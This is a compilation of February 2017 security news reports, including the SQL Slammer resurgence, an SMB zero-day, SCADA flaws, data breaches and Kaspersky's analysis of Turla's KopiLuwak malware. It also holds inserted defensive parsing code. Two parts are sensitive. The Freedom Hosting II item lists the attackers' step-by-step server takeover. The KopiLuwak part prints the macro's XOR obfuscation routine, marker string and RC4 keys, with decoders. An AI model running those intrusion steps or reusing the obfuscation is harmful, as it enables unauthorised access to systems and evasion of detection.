Last month, someone reported finding a vulnerability that exposed the private messages exchanged by users of the popular darknet marketplace AlphaBay. The individual who discovered the security hole claimed to have created a bot that collected more than 200,000 private messages.

The same individual also said he had identified a flaw in the Hansa marketplace, which allegedly allowed him to obtain 240,000 Hansa usernames.


The Slammer worm is back after 13 years to target ancient SQL servers
6.2.2017 securityaffairs Virus
The SQL Slammer worm, one of the longest-lived pieces of malware, appears to be back online, probing ancient SQL servers worldwide.
SQL Slammer is probably one of the longest-lived threats: it first appeared 14 years ago and is now back, targeting ancient SQL servers.

SQL Slammer exploits an old flaw in Microsoft SQL Server and Desktop Engine, and its traffic causes a denial of service. It was in 2003 that security researcher Michael Bacarella raised the alarm about Slammer, as the worm caused denial of service conditions on tens of thousands of systems around the world.

The researcher noticed "massive packet loss to various points on the globe" caused by a worm infecting MS SQL Server hosts and flooding randomly chosen addresses.

The worm exploits a buffer overflow vulnerability in Microsoft SQL Server 2000 or MSDE 2000 by sending a specially formatted request to UDP port 1434.

After the worm infects a server, it attempts to spread rapidly by sending the same payload to random IP addresses, causing a denial of service condition on the victim’s machine.
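The worm's datagram is simple enough to recognise from its shape alone: a single UDP datagram to port 1434 whose SQL Server Resolution Service request byte (0x04) is followed by a long run of 0x01 bytes that pads out the overflowed stack buffer. The following is an added example, not Check Point's detection logic: a parser for raw IPv4/UDP packets that classifies traffic to UDP/1434. The sample packets are constructed inline; the "Slammer-like" one copies only the worm's structure (leading 0x04, 97 bytes of 0x01, 376-byte payload), not its code, and the 96-byte padding threshold and the 64-byte "oversized query" cut-off are my assumptions.

```python
import socket
import struct

SSRP_PORT = 1434
SSRP_INSTANCE_QUERY = 0x04   # request type whose handler Slammer overflows
SLAMMER_PAD_MIN = 96         # run of 0x01 bytes treated as the worm's padding (assumed threshold)
MAX_SANE_QUERY = 64          # a real 0x04 query carries only a short instance name (assumed)


def parse_ipv4_udp(packet):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/UDP packet, else None."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    if packet[9] != 17 or len(packet) < ihl + 8:      # protocol 17 = UDP
        return None
    src = socket.inet_ntoa(packet[12:16])
    dst = socket.inet_ntoa(packet[16:20])
    sport, dport, ulen, _csum = struct.unpack_from("!HHHH", packet, ihl)
    payload = packet[ihl + 8: ihl + ulen]
    return src, dst, sport, dport, payload


def classify_ssrp(payload):
    """Classify a UDP/1434 payload as slammer, overflow-attempt, ssrp-query or ssrp-other."""
    if not payload or payload[0] != SSRP_INSTANCE_QUERY:
        return "ssrp-other"
    pad = payload[1:1 + SLAMMER_PAD_MIN]
    if len(pad) == SLAMMER_PAD_MIN and pad == b"\x01" * SLAMMER_PAD_MIN:
        return "slammer"
    if len(payload) > MAX_SANE_QUERY:
        return "overflow-attempt"          # same buffer, different filler bytes
    return "ssrp-query"


def inspect(packet):
    """Return (src, dst, verdict) for packets aimed at UDP/1434, None for everything else."""
    parsed = parse_ipv4_udp(packet)
    if parsed is None:
        return None
    src, dst, _sport, dport, payload = parsed
    if dport != SSRP_PORT:
        return None
    return src, dst, classify_ssrp(payload)


def build_ipv4_udp(src, dst, sport, dport, payload):
    """Constructed packet builder for testing (checksums zero; UDP checksum 0 is legal on IPv4)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + udp


# Constructed samples: Slammer-shaped padding plus filler, and a legitimate instance query.
SLAMMER_LIKE = bytes([SSRP_INSTANCE_QUERY]) + b"\x01" * 97 + b"\xcc" * (376 - 98)
LEGIT_QUERY = b"\x04MSSQLSERVER\x00"

if __name__ == "__main__":
    for name, payload in (("slammer-like", SLAMMER_LIKE), ("legit", LEGIT_QUERY)):
        print(name, inspect(build_ipv4_udp("10.0.0.5", "10.0.0.9", 5000, SSRP_PORT, payload)))
```

The same check belongs on the perimeter in the other direction: an internal host emitting "slammer" verdicts towards random addresses is an infected SQL Server 2000 box, which is exactly the population Check Point's data says still exists.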

SQL Slammer was built from proof-of-concept exploit code presented at Black Hat by David Litchfield, now a Google security researcher.

The Slammer worm used a SQL Server Resolution Service buffer overflow flaw, discovered by NGSSoftware and patched by Microsoft in July 2002.

Now Check Point researchers report that the threat resurfaced in late November and early December 2016 (between November 28 and December 4), with the largest share of attack attempts directed at machines in the US.

“During a routine analysis of global data collected by Check Point ThreatCloud, we detected a massive increase in the number of attack attempts between November 28 and December 4, 2016, making the SQL Slammer worm one of the top malware detected in this timeframe:” reads the analysis published by Check Point.

“The attack attempts detected by Check Point were directed to a large variety of destination countries (172 countries in total), with 26% of the attacks being towards networks in the United States. This indicates a wide wave of attacks rather than a targeted one.”

The researchers noticed that the largest volume of traffic associated with the Slammer Worm was originated from IP addresses in China, Vietnam, and Mexico.

Remarkably, the worm is still probing for a SQL Server 2000 buffer overflow that was patched more than 13 years ago and that some database administrators evidently still haven't fixed.

“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” states the report.


Windows SMB Zero-Day Exploit Released in the Wild after Microsoft delayed the Patch
6.2.2017 thehackernews Vulnerability
Last weekend a security researcher publicly disclosed a zero-day vulnerability in Windows 10, Windows 8.1 and Server editions after Microsoft failed to patch it in the past three months.
The zero-day memory corruption flaw resides in the implementation of the SMB (server message block) network file sharing protocol and could allow a remote, unauthenticated attacker to crash systems in a denial-of-service attack, which would then open them to further possible attacks.
According to US-CERT, the vulnerability could also be exploited to execute arbitrary code with Windows kernel privileges on vulnerable systems, but this has not been confirmed right now by Microsoft.
Without revealing the actual scope of the vulnerability and the kind of threat the exploit poses, Microsoft has just downplayed the severity of the issue, saying:
"Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
However, the proof-of-concept exploit code, Win10.py, has already been released publicly for Windows 10 by security researcher Laurent Gaffie and does not require targets to use a browser.
The memory corruption flaw resides in the manner in which Windows handles SMB traffic that could be exploited by attackers; all they need is tricking victims to connect to a malicious SMB server, which could be easily done using clever social engineering tricks.
"In particular, Windows fails to properly handle a server response that contains too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure," CERT said in the advisory.
"By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys."
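The CERT description above, a response carrying more bytes than the SMB2 TREE_CONNECT Response structure allows, is a bounds check a client parser can perform before touching the body at all. The following is an added example written in Python, not Microsoft's code and not the published proof of concept: a strict parser for the TREE_CONNECT response that rejects any message whose body is not exactly the 16 bytes the structure defines, with a builder that constructs a well-formed response and an oversized one for testing. The field layout follows MS-SMB2 (64-byte header, 16-byte TREE_CONNECT response body); the sample field values are constructed.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_TREE_CONNECT = 0x0003
SMB2_FLAGS_SERVER_TO_REDIR = 0x1
TREE_CONNECT_RESP_SIZE = 16       # StructureSize of the TREE_CONNECT Response


class SmbProtocolError(Exception):
    """Raised for any response the client refuses to process."""


def parse_tree_connect_response(msg):
    """Parse an SMB2 TREE_CONNECT response, refusing any bytes beyond the 16-byte body."""
    if len(msg) < SMB2_HEADER_LEN or msg[:4] != SMB2_MAGIC:
        raise SmbProtocolError("not an SMB2 message")
    header_size, _credit_charge, status, command = struct.unpack_from("<HHIH", msg, 4)
    if header_size != SMB2_HEADER_LEN or command != SMB2_TREE_CONNECT:
        raise SmbProtocolError("unexpected header fields")
    flags, next_command = struct.unpack_from("<II", msg, 16)
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise SmbProtocolError("not a server response")
    if next_command != 0:
        raise SmbProtocolError("compounded responses not handled here")
    body = msg[SMB2_HEADER_LEN:]
    if status != 0:
        return {"status": status}       # error responses carry an ERROR body, not this structure
    # The check the advisory describes as missing: the body must be exactly what the
    # structure declares. Trailing bytes are a protocol error, not data to copy around.
    if len(body) != TREE_CONNECT_RESP_SIZE:
        raise SmbProtocolError(f"body is {len(body)} bytes, expected {TREE_CONNECT_RESP_SIZE}")
    structure_size, share_type, _reserved, share_flags, caps, max_access = struct.unpack("<HBBIII", body)
    if structure_size != TREE_CONNECT_RESP_SIZE:
        raise SmbProtocolError("bad StructureSize")
    return {"status": status, "share_type": share_type, "share_flags": share_flags,
            "capabilities": caps, "maximal_access": max_access}


def accepts(msg):
    """True if the parser would process `msg`, False if it rejects it."""
    try:
        parse_tree_connect_response(msg)
        return True
    except SmbProtocolError:
        return False


def build_response(extra=b""):
    """Constructed SMB2 TREE_CONNECT response; `extra` appends bytes past the structure, as a malicious server would."""
    header = (SMB2_MAGIC
              + struct.pack("<HHIH", SMB2_HEADER_LEN, 0, 0, SMB2_TREE_CONNECT)   # StructureSize, CreditCharge, Status, Command
              + struct.pack("<HI", 1, SMB2_FLAGS_SERVER_TO_REDIR)                # CreditResponse, Flags
              + b"\x00" * 4                                                      # NextCommand
              + b"\x00" * 8                                                      # MessageId
              + b"\x00" * 4 + b"\x00" * 4                                        # Reserved, TreeId
              + b"\x00" * 8 + b"\x00" * 16)                                      # SessionId, Signature
    body = struct.pack("<HBBIII", TREE_CONNECT_RESP_SIZE, 0x01, 0, 0, 0, 0x001F01FF)  # disk share, full access
    return header + body + extra


if __name__ == "__main__":
    print("well-formed:", parse_tree_connect_response(build_response()))
    print("oversized accepted?", accepts(build_response(b"A" * 4096)))
```

The strict length comparison is the whole fix from the client's side; a server that needs to send more data than the structure allows has no legitimate way to do so in this message, so there is nothing to lose by refusing it.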
Since the exploit code is now publicly available to everyone and there is no official patch from Microsoft, all Windows users are left open to potential attacks at this time.
Until Microsoft patches the memory corruption flaw (most probably in the upcoming Windows update or out-of-band patch), Windows users can temporarily fix the issue by blocking outbound SMB connections (TCP ports 139 and 445 and UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has been given Common Vulnerability Scoring System (CVSS) score of 7.8. Proof-of-concept code has been published on GitHub.


New York Man Admits to Role in Cybercrime Operation

6.2.2017 securityweek Cyber

Vyacheslav Khaimov, a 55-year-old man from Brooklyn, New York, has admitted taking part in an international cybercrime scheme and pleaded guilty to operating an unlicensed money transmitting business.

Khaimov was initially charged with conspiracy to commit wire and bank fraud, wire fraud, bank fraud, money laundering conspiracy, and money laundering.

According to authorities, cybercriminals used "sophisticated malware" to gain access to bank accounts, mostly belonging to people in the United States. The funds stolen from these accounts were wired to money mules in the U.S., who sent them on to other intermediaries in the country, including Khaimov, or directly overseas.

The FBI determined that Khaimov, who had been using the alias “Samuel Gold,” received tens of thousands of dollars on numerous occasions from other mules, and forwarded the money to overseas co-conspirators, including to accounts in Thailand and various companies operated by these co-conspirators.

Investigators said Khaimov and a company he owned received more than $230,000 taken from the accounts of at least eight victims. Authorities believe the man was involved in fraudulent wire transfers pertaining to at least 20 victims.

The FBI has identified more than 20 money mules and over 30 victims. The cybercrime operation caused over $1.2 million in losses, but the fraudsters attempted to steal more than $6 million.

The FBI’s investigation into this scheme is ongoing and the agency says it’s determined to bring all co-conspirators to justice – court documents show there are at least four.


SCADA Honeywell XL Web II Controller exposed password in clear text
6.2.2017 securityaffairs Incident

The web-based SCADA system Honeywell XL Web II Controller is affected by multiple flaws that can be remotely exploited to expose passwords in clear text.
A popular web-based SCADA system designed by Honeywell is affected by multiple vulnerabilities that can be remotely exploited to expose passwords in clear text.

In order to access the password in clear text, the attacker just has to access a particular URL to trigger one of the flaws.

The vulnerabilities affect some versions of Honeywell XL Web II controllers, a system that is widely adopted in critical infrastructure across various industries, including energy, wastewater, and manufacturing.

According to the ICS-CERT security advisory, the majority of the affected products are located in Europe and the Middle East.

The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a security advisory to warn of the flaws.

“Independent researcher Maxim Rupp has identified vulnerabilities in Honeywell’s XL Web II controller application.” reads the security advisory. “An attacker may use these vulnerabilities to expose a password by accessing a specific URL. The XL Web II controller application effectively becomes an entry point into the network where it is located.”

ICS-CERT (@ICSCERT), 2 Feb 2017: "ICS-CERT issued advisory ICSA-17-033-01 Honeywell XL Web II Controller Vulnerabilities to ICS-CERT web site http://go.usa.gov/x9Hqg"

Maxim Rupp (@mmrupp), 6 Jan 2017: "#Honeywell XL1000C500 XLWebExe-2-01-00 and prior + XLWeb 500 XLWebExe-1-02-08 and prior. Coming soon. #ICS #Advisory"
The affected products are the Honeywell XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior.

Honeywell has produced a new version (version 3.04.05.05) to address the vulnerabilities; to receive the security update, customers have to contact their local Honeywell Building Solutions branch.

Other flaws in the Honeywell XL Web II controllers allow an attacker to carry out a path traversal attack by accessing a specific URL, to open and change some parameters by accessing a particular URL, or to establish a new user session.

The researcher Maxim Rupp, who discovered the flaws, has detailed them in a recently published blog post.


Anonymous Hacker took down over 10,000 Dark Web Sites; Leaked User Database
5.2.2017 thehackernews Hacking

Dark Web is right now going through a very rough time.
Just two days ago, a hacker group affiliated with Anonymous broke into the servers of Freedom Hosting II and took down more than 10,000 Tor-based .onion dark websites with an alarming announcement to its visitors, which said:
"Hello, Freedom Hosting II, you have been hacked."
Freedom Hosting II is the single largest host of underground websites accessible only through the Tor anonymising browser; it hosts somewhere between 15 and 20 percent of all sites on the Dark Web, anonymity and privacy researcher Sarah Jamie Lewis estimated.
Besides defacing all Dark Web sites hosted on Freedom Hosting II with the same message and stealing its database, the hackers also demanded a ransom for 0.1 Bitcoin (just over $100) to return the compromised data to the hosting service.
Now, it has been reported that the stolen database from Freedom Hosting II has publicly been released online to a site hosted on the Tor network, which includes the email details of nearly 381,000 users, 'Have I Been Pwned' tweeted.

According to the Anonymous hackers, more than 50 percent of all files hosted on Freedom Hosting II servers were related to child pornography.
Those illegal websites were using gigabytes of data when Freedom Hosting II officially allows no more than 256MB per site, the Anonymous hacker claimed.
In addition to dark site user details, the data dump also contains backups of website databases, most of which belong to popular, free, open source content management systems and forums like WordPress and phpBB.
In an interview with Motherboard, an Anonymous hacker who claimed responsibility for the hack said this was his first hack ever, and he never intended to take down the hosting provider.
But when he allegedly discovered several large child pornography websites using more than Freedom Hosting II's stated allowance, he decided to take down the service. The hacker claimed to have downloaded 74GB of files and a user database dump of 2.3GB.
Lewis has been analyzing the leaked data and reported that the database contains Dark Web users' numerous plain text emails, usernames, and hashed passwords from forum websites hosted by Freedom Hosting II.
While it's bad news for users who joined one of those forums providing their genuine personal details, law enforcement would be happy, as in a separate case, the FBI used location-tracking malware to infiltrate Dark Web porn sites and track individual users.


Anonymous hacked Freedom Hosting II, a fifth of the Dark Web is down
5.2.2017 securityaffairs Hacking

The hacktivist collective Anonymous hacked the popular Dark Web hosting provider Freedom Hosting II; a fifth of all .onion websites are down.
The collective Anonymous is back: this time the hacker group breached Freedom Hosting II, a popular Dark Web hosting provider.

After the closure of the original Freedom Hosting, Freedom Hosting II (FHII) became one of the largest onion web hosting providers, offering free space to any user who signs up for an account.

Anonymous targeted the popular Tor hosting provider because it was providing its services to a large number of websites sharing child pornography images.

The cyber attack was first spotted by Sarah Jamie Lewis, a privacy researcher at mascherari.press, who noticed the mass defacement during a regular scan of the Tor network.

Sarah Jamie Lewis (@SarahJamieLewis), 3 Feb 2017: "Looks like Freedom Hosting II got pwned. They hosted close to 20% of all dark web sites (previous @OnionScan report) https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/" (linked report: "OnionScan Report: September 2016 - Uptime, Downtime and Freedom Hosting II", mascherari.press: "In this report we will examine how a single hosting provider has had a dramatic affect on the dark web.")
Since OnionScan started in April, Sarah Jamie Lewis and her team have observed FHII hosting between 1500 and 2000 services, about 15-20% of the total number of active sites in their scanning lists (data from the last report, published in October).

Back to the present: 10,613 .onion sites have been taken down as a result of the Freedom Hosting II hack, and all of them have been defaced with the following image. As you can see, the Anonymous message also includes a list of hacked websites.

Freedom Hosting II hacked
Source Bleepingcomputer.com

Below is the message published by Anonymous:

“Hello Freedom Hosting II, you have been hacked

We are disappointed… This is an excerpt from your front page ‘We have a zero tolerance policy to child pornography.’ – but what we found while searching through your server is more than 50% child porn…

Moreover you host many scam sites, some of which are evidently run by yourself to cover hosting expenses.

All your files have been copied and your database has been dumped. (74GB of files and 2.3GB of database)

Up to January 31st you were hosting 10613 sites. Private keys are included in the dump. Show full list

We are Anonymous. We do not forgive. We do not forget. You should have expected us.

Thanks for your patience, you don’t have to buy data 😉 we made a torrent of the database dump download here

Here another torrent with all system files (excluding user data) download

You may still donate BTC to 14iCDyeCSp12AmhVfJGxtrzXDabFop4QtU and support us.

If you need to get in contact with us, our mail is fhosting@sigaint.org

We repeatedly get asked how we got into the system. It was surprisingly easy. Here is how we did it: HOW TO HACK FH2“

According to The Verge, Anonymous offered to sell the compromised data back to Freedom Hosting II in exchange for 0.1 bitcoin (roughly $100).
Further analysis revealed that the attackers received at least two payments in their Bitcoin wallet, but they opted to publicly leak the data dump via torrent files.

Watch out, the 2.3 GB dump may contain disturbing images, don’t download the archive if you don’t need it. Anonymous claims to have downloaded 74GB of files.

Joseph Cox from Motherboard interviewed one of the Anonymous hackers involved in the attack, who explained that this was his first hack ever and that he did not plan to take down all the websites hosted on Freedom Hosting II.

“On Saturday, the hacker claiming responsibility told me in more detail how and why they took down the service.” wrote Cox.

“This is in fact my first hack ever,” they said in an email sent from the same address posted to the hacked Freedom Hosting II sites. “I just had the right idea.”

The hacker, who first compromised the service on January 30, told Vice that they found ten child pornography sites that had uploaded so much content that it accounted for nearly half of the total Freedom Hosting II files.

The security expert Chris Monteiro, who analyzed some of the dumped data, confirmed that the archive includes .onion URLs hosting botnets, fraud sites, fetish websites, hacked data, and of course child abuse websites.

The archive is full of private keys related to the dark web sites that could be used to impersonate them.

Freedom Hosting II private keys


Deku_shrub (@Deku_shrub), 3 Feb 2017: "It's hungry work combing through these leaked databases"

Deku_shrub (@Deku_shrub), 3 Feb 2017: "Did you know you can access the WWE from the hacked accounts on the darknet? Am disappointed at the lack of John Cena references"

Deku_shrub (@Deku_shrub), 3 Feb 2017: "Looks like some botnets will have been knocked out in the Freedom Hosting II hack too"
Below is the step-by-step procedure followed by Anonymous to hack Freedom Hosting II.

1. create a new site or login to an old one
2. login and set sftp password
3. login via sftp and create a symlink to /
4. disable DirectoryIndex in .htaccess
5. enable mod_autoindex in .htaccess
6. disable php engine in .htaccess
7. add text/plain type for .php files in .htaccess
8. have fun browsing files
9. find /home/fhosting
10. look at the content of the index.php file in /home/fhosting/www/
11. find configuration in /home/fhosting/www/_lbs/config.php
12. copy paste database connection details to phpmyadmin login
13. find active users with shell access in /etc/passwd
14. look through the scripts and figure out how password resets work
15. manually trigger a sftp password reset for the user 'user'
16. connect via ssh
17. run 'sudo -i'
18. edit ssh config in /etc/ssh/sshd_config to allow root login
19. run 'passwd' to set root password
20. reconnect via ssh as root
21. enjoy
Stay Tuned.



12 InterContinental Hotels Group properties suffered a massive data breach
5.2.2017 securityaffairs Incident

Hackers compromised payment systems at 12 US properties of the InterContinental Hotels Group and stole card data with malware.
The hospitality giant InterContinental Hotels Group (IHG) has confirmed that the payment systems of 12 US hotels were hit by a massive data breach. Just a month ago the company had confirmed an ongoing investigation into an alleged card breach at some of its properties.

The InterContinental Hotels Group (IHG) informed its customers that payment cards used between August and December 2016 at restaurants and bars of the 12 US hotels were affected by the data breach. The affected properties include the InterContinental San Francisco, the Holiday Inn Resort – Aruba, and the InterContinental Chicago Magnificent Mile.


The hackers used malware to infect payment systems and steal card data, including cardholders’ names, card numbers, expiration dates, and internal verification codes.

“IHG hired leading cyber security firms to examine the payment card processing systems for the hotels that it manages in the Americas region. Based on the investigation, IHG is providing notification to guests who used their payment card at restaurants and bars of 12 company managed properties during the time periods from August 2016 – December 2016. An investigation of other properties in the Americas region is ongoing.” reads the official announcement published by the company.

The hospitality giant confirmed that the malicious code used by crooks did not affect payment cards used at the front desk.

“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties. Cards used at the front desk of these properties were not affected.” continued the statement from the company.

The InterContinental Hotels Group reported the security breach to law enforcement and is collaborating with the payment card networks so that banks can monitor for fraudulent transactions.

At the time of writing there is no news regarding the number of affected customers.

IHG has established a dedicated call center to answer guests’ questions; additional information about the security breach is available at the following website:

www.ihg.com/protectingourguests.


PoliceOne hacked – Hacker is selling thousands police officials’ accounts
5.2.2017 securityaffairs Hacking

PoliceOne, a forum used only by verified law enforcement officials, has been hacked and the data dump was offered for sale on a dark web market.
A hacker has stolen over 700,000 user accounts from the popular law enforcement forum PoliceOne and is offering the entire database for sale.

The PoliceOne forum is used by verified police officers and investigators to exchange information on techniques of investigation, training or other law enforcement centric discussions.

“PoliceOne.com is the #1 resource for up-to-the-minute law enforcement information online. More than 500,000 police professionals nationwide are registered PoliceOne members and trust us to provide them with the most timely, accurate and useful information available anywhere.” reads the description of the website.

The news was reported by Motherboard: the valuable data was offered for sale by a hacker who goes by the moniker Berkut.

“We have confirmed the credibility of a purported breach of the PoliceOne forums in 2015 in which hackers were potentially able to obtain usernames, emails and hashed passwords for a portion of our members. While we have not yet verified the claim, we are taking immediate steps to secure user accounts and our forums, which are currently offline while we investigate and gather more information,” a spokesperson for PoliceOne told Motherboard in an email.

“While we store only limited user data and no payment information, we take any breach of data extremely seriously and are working aggressively to resolve the matter. We will be notifying potentially-affected users as a matter of priority and requiring them to change their passwords,” he added.

PoliceOne data breach
“Emails from NSA, DHS, FBI and other law enforcement agencies as well as other US government agencies,” Berkut’s listing on the Tochka dark web market reads.

Berkut is selling the full database, which includes around 715,000 user accounts and dates from 2015, for $400. He listed the data dump, which contains emails from the main US intelligence agencies (NSA, DHS, FBI), on the Tochka dark web market, and confirmed that he had already sold the archive on other forums as well.

As proof of the hack, Berkut provided Motherboard with several samples of the data, including user details (i.e. usernames, email addresses, subscription dates, MD5 hashed passwords). However, the passwords also included salts—random strings of characters used to make a hash more resilient.

Let me remind you that MD5 hashed passwords are very easy to crack.

“The files did indeed contain valid email addresses from the NSA and other US government agencies; one file allegedly contained over 3,000 account details for Homeland Security staffers.” reported the Motherboard.

“To verify that emails in the dump were connected to real accounts on PoliceOne, Motherboard attempted to create new users with a random selection of email addresses. Out of 15 addresses, 14 were already registered on the site.”

How did Berkut hack the PoliceOne website?

PoliceOne was running a flawed version of the popular vBulletin CMS (likely version 4.2.3), so it was quite easy for the hacker to find an exploit online and breach it.


KopiLuwak: A New JavaScript Payload from Turla
4.2.2017 Kaspersky Virus
On 28 January 2017, John Lambert of Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a “very interesting .JS backdoor“. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ICEDCOFFEE payloads, detailed in a private report from June 2016 (available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

Targeting for this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. Popularity of the malware, however, is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits as of January 2017. We assess with high confidence this new JavaScript will be used more heavily in the future as a stage 1 delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.

Actor Profile

Turla, also known as Snake / Uroburos / Venomous Bear and KRYPTON is a Russian-speaking APT group that has been active since at least 2007. Its activity can be traced to many high-profile incidents, including the 2008 attack against the US Central Command, (see Buckshot Yankee incident) or more recently, the attack against RUAG, a Swiss military contractor. The Turla group has been known as an agile, very dynamic and innovative APT, leveraging many different families of malware, satellite-based command and control servers and malware for non-Windows OSes.

Targeting Ukraine, EU-related institutions, governments of EU countries, Ministries of Foreign Affairs globally, media companies and possibly corruption related targets in Russia, the group intensified their activity in 2014, which we described in our paper Epic Turla. During 2015 and 2016 the group diversified their activities, switching from the Epic Turla waterhole framework to the Gloog Turla framework, which is still active. They also expanded their spear phishing activities with the Skipper / WhiteAtlas attacks, which leveraged new malware. Recently, the group has intensified their satellite-based C&C registrations ten-fold compared to their 2015 average.

Technical Details

Sample MD5: 6e7991f93c53a58ba63a602b277e07f7
Name: National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc
Author: user
LastModifiedBy: John
CreateDate: 2016:11:16 21:58:00
ModifyDate: 2016:11:24 17:42:00


The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs (MoFA) in Cyprus. Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc), it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.

The document contains a malicious macro, very similar to previous macros used by Turla in the past to deliver Wipbot, Skipper, and ICEDCOFFEE. However, the macro did contain a few modifications to it, mainly the XOR routine used to decode the initial JavaScript and the use of a “marker” string to find the embedded payload in the document.

New XOR Routine

Below is a snippet of the new XOR routine used to decode the initial JavaScript payload. Turla has consistently changed the values used in this routine over the last year, presumably to avoid easy detection:

Function Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolean
    Dim THQNfU76nlSbtJ5nX8LY6 As Byte
    THQNfU76nlSbtJ5nX8LY6 = 45
    For i = 0 To M5wI32R3VF2g5B21EK4d - 1
        EjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6
        THQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))
    Next i
    Q7JOhn5pIl648L6V43V = True
End Function
Here is a function written in Python to assist in decoding of the initial payload:

def decode(payload, length):
    """Python port of the macro's XOR routine: decodes `length` bytes of
    `payload` (a bytearray) in place and returns it."""
    varbyte = 45
    for i in range(length):
        payload[i] = payload[i] ^ varbyte
        # The key byte evolves from its previous value and the position only.
        varbyte = ((varbyte ^ 99) ^ (i % 254))
    return payload
Payload Offset

Another change in the macro is the use of a “marker” string to find the payload offset in the document. Instead of using hard coded offsets at the end of the document as in ICEDCOFFEE, the macro uses the below snippet to identify the start of the payload:

Set VUy5oj112fLw51h6S = CreateObject("vbscript.regexp")
VUy5oj112fLw51h6S.Pattern = "MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
Set I4j833DS5SFd34L3gwYQD = VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)
Second Layer JavaScript

Once the marker is found, the macro will carve out “15387 + 1” bytes (hard coded) from the end of the marker and pass that byte array to the aforementioned decoding routine. The end result is a JavaScript file (mailform.js – MD5: 05d07279ed123b3a9170fa2c540d2919) written to “%APPDATA%\Microsoft\Windows\”.


mailform.js – malicious obfuscated JavaScript payload

This file is then executed using Wscript.Shell.Run() with a parameter of “NPEfpRZ4aqnh1YuGwQd0”. This parameter is an RC4 key used in the next iteration of decoding detailed below.

The only function of mailform.js is to decode the third layer payload stored in the JavaScript file as a Base64 string. This string is Base64 decoded, then decrypted using RC4 with the key supplied above as a parameter (“NPEfpRZ4aqnh1YuGwQd0”). The end result is yet another JavaScript which is passed to the eval() function and executed.
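The two decoding steps described above (marker carve plus XOR for layer 1, Base64 plus RC4 for layer 2), as an added worked example in Python; this is not code from the Kaspersky analysis or from the malware. Marker, carve length and both RC4 keys are the values quoted in this analysis; the way the Base64 payload is located inside the layer-2 script (longest Base64-looking run) is an assumption, and the beacon-body decoder goes one step beyond this section by applying the second key the third-layer script uses.

```python
import base64
import re

# Values from the analysis: the marker the macro searches for, the number of
# bytes it carves after the marker, the RC4 key handed to mailform.js, and the
# RC4 key the third-layer script uses on ~dat.tmp / beacon data.
MARKER = b"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1SiFOkR1Hh"
CARVE_LEN = 15387 + 1
LAYER2_RC4_KEY = b"NPEfpRZ4aqnh1YuGwQd0"
PROFILE_RC4_KEY = b"2f532d6baec3d0ec7b1f98aed4774843"


def xor_layer1(data: bytes) -> bytes:
    """Port of the macro's XOR routine (the VBA function quoted above).

    The key byte starts at 45 and is updated from its previous value and the
    byte index only, so applying the routine twice restores the input.
    """
    out = bytearray(len(data))
    key = 45
    for i, b in enumerate(data):
        out[i] = b ^ key
        key = (key ^ 99) ^ (i % 254)
    return bytes(out)


def carve_layer1(document: bytes, carve_len: int = CARVE_LEN) -> bytes:
    """Find the marker and XOR-decode the fixed-length blob that follows it."""
    pos = document.find(MARKER)
    if pos < 0:
        raise ValueError("marker not found: not a KopiLuwak-style dropper")
    start = pos + len(MARKER)
    blob = document[start:start + carve_len]
    if len(blob) < carve_len:
        raise ValueError("document is shorter than the macro expects")
    return xor_layer1(blob)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


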